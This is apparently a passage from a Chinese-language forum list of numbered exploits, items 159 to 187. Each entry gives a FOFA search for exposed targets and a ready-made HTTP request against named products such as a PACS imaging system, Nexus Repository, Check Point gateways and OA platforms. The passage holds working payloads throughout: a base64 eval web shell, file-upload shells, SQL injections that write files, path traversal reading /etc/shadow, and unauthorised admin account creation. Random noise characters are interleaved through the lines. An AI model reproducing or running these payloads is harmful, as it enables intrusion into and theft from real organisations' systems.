Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

' i7 E" U- f+ L  X6 C" \  J5 k
& d3 Z* M* V) c$ N0 }; i" c$ q159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
" {9 v( H% E7 q: e/ R4 H4 v- _* zFOFA："INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
& }, A; ]+ s/ _6 i7 U0 [POST /webservices/WebJobUpload.asmx HTTP/1.1
2 J! }, k9 Q0 h1 A" m' f- S* ~; m' MHost: x.x.x.x
6 U' o! a4 @0 L' ^& n% J/ IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
  R0 c! E- z2 [Accept-Encoding: gzip, deflate
8 x& c- r, k" N& P+ I) rConnection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
, b! X+ p' \" w/ z
0 X. g: L! a* l  a( W<?xml version="1.0" encoding="utf-8"?>
) G0 F" g9 @/ U3 p7 n" Q<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
, V; X+ P; V" e5 H/ F- E- K, p<soap:Body>
<jobUpload xmlns="http://rainier">
1 @+ z4 F* S* z0 K<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
1 T3 J8 w/ j( n1 B<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
+ v$ I( _: ~/ `4 `</soap:Body>
</soap:Envelope>

$ B" n9 B! \1 X
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
( T, b+ Y2 ~. v

2 b+ ^3 N. Q+ _9 d& Z& g. i" M160. Sonatype Nexus Repository 3目录遍历与文件读取
! p5 E! A' {) `7 X$ `" ?# H5 i0 ?" vCVE-2024-4956
FOFA：title="Nexus Repository Manager"
4 @! Z! n# H9 ]/ tGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
, d+ `: |* q% B2 P8 S  b4 SHost: x.x.x.x
' m5 w) f% }8 ?/ b2 M" N/ ^' H. y7 oUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
; E6 K' y0 D. x4 {  e1 rConnection: close
- L; I6 F# L1 _6 \Accept: */*
: M8 Q8 O, l) P7 j4 ?/ I2 w4 `4 XAccept-Language: en
5 k6 q' C; o6 i( e5 h& w, w- ~Accept-Encoding: gzip
' W/ b5 r; F5 j

) O, V( T, x* l0 v0 n1 D# |* r161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
FOFA：body="/KT_Css/qd_defaul.css"
第一步，上传文件<fileName>字段指定文件名，<fileFlow>字段指定文件内容，内容需要base64加密
POST /Webservice.asmx HTTP/1.1
7 A* w7 m" Q! R$ |" b( gHost: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
: l; @0 L& U* ^5 s: @  h4 L" m2 gContent-Length: 445
Content-Type: text/xml
) u# p8 i  K& QAccept-Encoding: gzip

) S9 H  S0 n, Y$ t<?xml version="1.0" encoding="utf-8"?>
) m5 V2 q# U$ s6 V) G# t<soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
3 B0 N7 q7 a. ]( ]+ oxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
) K) V6 J3 b4 E3 Y& T<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
! s5 r. t; r- y! X2 f, p! o</UploadResume>
- C& U# }' r. u/ w0 G</soap:Body>
</soap:Envelope>
9 _9 m- C; a( o4 m8 K# E

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
FOFA: app="和丰山海-数字标牌"
# P" I2 n; V3 _3 X9 _POST /QH.aspx HTTP/1.1
0 n; J( j+ f+ c" A- ]Host: x.x.x.x
/ o, z, m7 W' Z  s, X3 W% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
! r* |: r0 B+ W2 p6 ^" }% [  FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

- Z0 }/ q- N- T. z3 U, y------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream
9 w% Y( C# w  `" O; n+ L
<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"
2 x6 z7 d5 h: S
; C3 [3 P" p* n( t3 Q7 |" ?$ Bupload
7 l% l6 w( M5 |. W3 P------WebKitFormBoundaryeegvclmyurlotuey
0 E- d+ z$ ^: K: L5 YContent-Disposition: form-data; name="responderId"

ResourceNewResponder
+ b: m9 Y0 y+ w2 T  N------WebKitFormBoundaryeegvclmyurlotuey
! U& g+ o& X6 u9 n8 _0 C2 ~$ ~Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

, g4 s- u4 d7 `7 i
http://x.x.x.x/opt/resources/kjuhitjgk.aspx

% j# f/ Q; ?8 l7 m5 h* {- [163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
; M' I4 v+ ]* q7 r9 r- J: @9 W4 \Host: x.x.x.x
3 Z1 o. u7 D# p% P( J$ G6 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
9 q: _- `4 B* c) C: `- c' f  G( EContent-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
  f/ U' K$ D5 X5 a- gAccept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

& V/ K8 e6 z3 k0 I8 q5 }  q------iiqvnofupvhdyrcoqyuujyetjvqgocod
. ]. g: {7 M; Q4 Y+ a1 s6 i7 KContent-Disposition: form-data; name="name"

1.php
- j' x2 n- s: c, f1 Q" I------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
' R8 U5 o$ b  {% `/ G& ?1 V  DContent-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
7 R" }% \( B" K7 B9 A
5 }. ^/ y' A4 z+ q7 g8 X; i
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
  A* R. I3 ]. N3 J, C- {FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
! }4 k) g  |3 ?5 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
  m! i3 @% w# e  a# j4 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
4 i  \' V. {. x5 ^5 Q! sContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
+ i, ^% q- g$ }. B( ]7 `X-Requested-With: XMLHttpRequest
+ M, s' r0 p% H3 Y* D9 g& h7 ^# [Accept-Encoding: gzip
0 _; N4 F1 y* Y1 z4 S
. G9 B4 R4 u3 m( h( Q: S------dqdaieopnozbkapjacdbdthlvtlyl
, }( Z. g2 W1 ?+ A0 E" nContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
" E: ]+ Q" o4 U) p- t( q* N! xContent-Type: image/jpeg
+ J1 t, P5 Z/ A
& L$ }' ]) P3 |* W' I5 v" w<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
+ d. k' r, V: b9 e3 U- d  j
165. OrangeHRM 3.3.3 SQL 注入
CVE-2024-36428
4 p. E9 h2 }& eFOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
8 O! }2 {' `3 x% N& q: `$ M0 o1 n

! F+ p/ p3 d& h$ b166. 中成科信票务管理平台SeatMapHandler SQL注入
FOFA：body="技术支持：北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
: C/ Y$ W7 o" S8 X, g* wCache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
6 k& Y, b+ g9 i! @! e( Q2 {) xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, W4 A) N6 Z9 b" x6 LAccept-Encoding: gzip, deflate
  y" B  s% X$ ~$ t$ {Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
$ R" o# e0 N7 f5 `4 V. ~; sContent-Length: 89

) H) r  C: e6 R5 X; b: cMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

7 q& }" D5 i* j) Q; k
167. 精益价值管理系统 DownLoad.aspx任意文件读取
FOFA：body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
; U1 r2 [+ O# N4 d% X6 NHost:
" Y4 m) U, C( M  H" E' s+ ~* VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
, |* N6 A9 v1 e4 {- D7 uAccept-Encoding: gzip, deflate
Accept: */*
) Y" X! o/ b3 H2 L; r/ pConnection: keep-alive

* O4 X& M; j  O* }5 j" y) G& P1 K
. d+ W4 z& o3 d( N168. 宏景EHR OutputCode 任意文件读取
FOFA：app="HJSOFT-HCM"
3 r! B! E  t% F' w) c- }0 g4 bGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
# ~4 Q- j  E" Z# x! ]Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
* m  V% t) t) y- T4 F1 sContent-Type: application/x-www-form-urlencoded
6 I( I1 b& C1 S) ~: T5 _& tConnection: close

. P. v. {) f# b2 f- E! o
+ Z- S% o( k7 ?- O/ }
7 {0 p4 z+ z0 J: M# }) |, v/ E$ U, m169. 宏景EHR downlawbase SQL注入
FOFA：app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
* ~- ?, F% n0 L2 c0 pHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
9 t; i; R2 }7 y; j# fConnection: close

4 @. u( C; r6 @6 T/ D
# q9 T* x/ |) ?4 j$ P
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
0 p. Z$ J* M* k, M9 l3 p3 \: |FOFA：body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
3 v" J. f- ^% |: G" k( B8 r" @4 dUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml
( r( I0 z8 U, O% l) n+ ~) O3 s- G

171. 通天星CMSV6车载定位监控平台 SQL注入
FOFA：body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
5 P) p( Z/ o* A9 D0 E1 _; cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
2 W, j, M6 t+ \& _& F9 mConnection: close
$ w) T- M; }- d) x0 \  n
- p: |& j1 A$ s2 _8 z* A. c7 S9 o

9 \0 h5 d5 [! n6 J) l6 R$ t172. DT-高清车牌识别摄像机任意文件读取
0 I. k- ^9 ~& l# d  Z$ i& {$ TFOFA：app="DT-高清车牌识别摄像机"
0 v. B8 r: @* B0 r; IGET /../../../../etc/passwd HTTP/1.1
2 u; N7 F: [1 H" g. h$ HHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
6 g* o: k* j# ?( p7 F% q  TConnection: keep-alive
# T' _. p4 _, Q& z0 O
& k! @/ l- n, T+ z! s$ h
9 K& [4 m5 z/ g$ z, I4 E7 o
0 a. N9 B0 r) f' |$ n' |173. Check Point 安全网关任意文件读取
' Z2 P! j0 L5 T  b6 }CVE-2024-24919
( d# u- ~" y# dFOFA：app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
  K+ R* R- {7 `4 X- F+ Q6 z8 VContent-Type: application/x-www-form-urlencoded

* U7 t8 s5 e; oaCSHELL/../../../../../../../etc/shadow

  V& `( y- r7 o# t# c- I5 b

174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 k" L- A4 E* R/ k, XFOFA：app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
: s* f+ V' B! s" n& q2 B3 c* KHost: your-ip
- U+ J& I, ^9 l& [7 ]7 u  `  P  GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% h. c- n% ?: g5 Y" H# S7 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 b- @8 `7 ?1 b7 CAccept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
3 F6 Q% T  Y; q2 tConnection: close
4 k+ w3 J2 k) A7 X) A% {+ i4 N


175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
FOFA：app="金和网络-金和OA"
, ^. T! m/ k1 {: CGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
1 w+ f7 @( r$ P2 f+ w) U4 z" v! aUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 ]1 |  I" w6 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
; `) `( i4 M! @1 X7 c+ w8 J3 O! eUpgrade-Insecure-Requests: 1
, o6 l* M* S7 f& x8 N

' D( V5 m9 Z9 O5 l) H. G/ a( m176. 电信网关配置管理系统 rewrite.php 文件上传
4 Z! |+ m% V) E0 F% w9 U$ B0 ^FOFA：body="img/login_bg3.png" && body="系统登录"
- `1 a8 p+ _! |+ n' `( ZPOST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
7 n! _4 r4 O' h0 H" V+ \* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) l. {1 J6 J& y4 I1 N" mContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close
8 ~: ]7 ]# }2 h2 l- F/ q1 P
4 Y6 A/ n3 [* o, |$ `) L------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

6 `- x( M' ?# C* f* D9 r2 D2 Y3 W<?php system("cat /etc/passwd");unlink(__FILE__);?>
* i0 j% t! T: q0 F; [------WebKitFormBoundaryOKldnDPT
/ `0 R5 U4 H  ^) b( |" X4 g3 QContent-Disposition: form-data; name="uploadtime"


( B& Y3 }3 O) I------WebKitFormBoundaryOKldnDPT--
6 i4 T* j0 ~9 x0 I5 N- M$ [

" M3 I& M( {& L( q
177. H3C路由器敏感信息泄露
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
" ?7 O& C4 [# p' `3 q/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
# M! E- Y/ j! @5 q0 ^+ p, n) \' W/userLogin.asp/../actionpolicy_status/../GR3200.cfg
9 {( ^$ y  a9 H% g6 E' C) a6 e0 @1 i/userLogin.asp/../actionpolicy_status/../GR2200.cfg
  s6 |4 |' N1 x3 ^: `6 ~/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
9 T$ _& W+ O& r  i/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
0 X( N6 S$ H& K) W2 n/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
( x  C9 w/ E  f+ Q, ?  @" `/userLogin.asp/../actionpolicy_status/../ER5200.cfg
" ]$ c& K6 I, ^+ L9 h1 Y, U& F" Y) W/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
9 f. f8 \( S" Y# @/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
7 P* P. w! q* ]( R# t) G/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
% E3 I& L% H( z/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C校园网自助服务系统-flexfileupload-任意文件上传
FOFA：header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
5 r* [3 H& j5 s) s- t" e* aHost:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; t: c8 v" u4 n* d: FContent-Length: 252
! U" l: A6 J5 ?% `Accept-Encoding: gzip, deflate
: b! W( @: w% T7 S8 q1 FConnection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
-----------------aqutkea7vvanpqy3rh2l
4 z" n8 N7 w  R# y9 X  hContent-Disposition: form-data; name="12234.txt"; filename="12234"
1 W" T, R4 [, E2 P3 p' uContent-Type: application/octet-stream
& Z! A  P6 A1 v  i7 n  e9 hContent-Length: 255

% g0 P/ F: ^& y! ~) F1 z) U9 s12234
# L. s0 |+ B- Y/ a: G% F# L! ]-----------------aqutkea7vvanpqy3rh2l--
7 t# E* u0 ^# @8 R
3 K0 ]1 Q* H8 Y  _9 v. N' @
3 h' z! f# l* Q0 xGET /imc/primepush/%2e%2e/flex/12234.txt
) B5 V3 E2 D; |, o* X, ]
# u/ ?# H% T0 Q( W0 @) X1 }$ F
179. 建文工程管理系统存在任意文件读取
0 v2 w* _8 B) Z5 E# g% C& qPOST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
: }5 ]: Y: B, g& C4 Q9 C% S& gUser-Agent: Mozilla/5.0

path=../log4net.config&Name=

* o" }* h$ x  J* c
$ y/ f' c3 `" z' |) O1 {180. 帮管客 CRM jiliyu SQL注入
FOFA：app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
9 \/ j/ F$ n8 H+ ?  G0 UHost: your-ip
6 R- K1 l/ D' e) AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
  r6 M9 G% F. c8 m' VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- I/ Y# h# P  \Accept-Encoding: gzip, deflate
# m/ s+ ^7 R0 q' U1 ^0 GAccept-Language: zh-CN,zh;q=0.9
Connection: close


3 Q( \$ z, j0 t/ y$ P, @! b181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
FOFA："PDCA/js/_publicCom.js"
7 E/ h8 h% O0 w. p! nPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
( |4 r9 S) \: G# d2 j2 K& a* vHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 K. C' P" W9 y7 U8 W% i" p$ CAccept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
6 \" _4 u  U; B6 x, ~" L( YConnection: close
# f3 G" h; K1 f" U: oContent-Type: application/x-www-form-urlencoded
. G! g' [) ~3 Q8 ?4 |# e" G
" T6 h: p8 ~# l7 i- M7 r7 h( Y# l. G3 j
, j5 V5 k( E  v, L' V, Eaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


7 P4 n- I. N8 D2 g( I* \182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
2 m! h5 M$ x4 v3 dFOFA："PDCA/js/_publicCom.js"
/ y2 E) [0 h5 L0 F4 IPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
5 Q: |* b0 a4 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, n  e" O  _1 V' b+ [Accept-Encoding: gzip, deflate, br
% \/ }- E/ i% B% t1 LAccept-Language: zh-CN,zh;q=0.9
9 C2 ~! w( t( zConnection: close
  _& o+ [- B/ `- T2 Y0 KContent-Type: application/x-www-form-urlencoded
  x( }* e! t( ~2 \5 b/ ^: k( J

1 y2 N4 J7 @* Z6 ?. _/ Susername=test1234&pwd=test1234&savedays=1


183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
8 ]3 N( s& T9 \! L& r& c# wFOFA：body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
# l+ t! ^: r8 T7 J3 N5 R9 i1 tAccept-Encoding: gzip, deflate
- f# |; m0 u' LConnection: close


4 N( e5 N0 D8 d- r7 P184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
- H2 `+ p5 ~6 n% O+ V1 Q  N9 P( VFOFA：server="SunFull-Webs"
& p, ]5 k/ p" t; T/ N% k1 APOST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
3 N0 m8 |8 w7 L4 DContent-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 |$ ]! C1 C% l4 VX-Requested-With: XMLHttpRequest

& x" d- v% Y+ A/ P# y. R% {7 W/ S6 E
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
, |& G0 l( S3 ?! S5 r% y1 k& [
! c1 T2 C! ~1 l4 }0 K
185. 瑞友天翼应用虚拟化系统SQL注入
version < 7.0.5.1
FOFA：app="REALOR-天翼应用虚拟化系统"
5 j8 V! F- z0 j. `! Q- M6 MGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host
0 s5 ~9 \, @  U7 H& G4 @
* I8 Z4 _0 {. i
, j9 P: A* G6 W. B$ h* R& [186. F-logic DataCube3 SQL注入
CVE-2024-31750
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
2 k) a3 A3 @/ P4 Q( z5 kFOFA：title=="DataCube3"
) w% q- c& y2 v4 {$ vPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
4 n) j6 C8 f0 D8 C4 {$ U. |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
* ^; _( m2 Q; W+ ]- `8 K2 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
: N% y* V2 Z4 E  \) }% EContent-Type: application/x-www-form-urlencoded
- a- U9 y, l% F
4 I4 E& G% O# x+ ]req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
  f1 _+ g2 ?& I4 {1 A1 ]" e1 p% F. B. }

187. Mura CMS processAsyncObject SQL注入
CVE-2024-32640
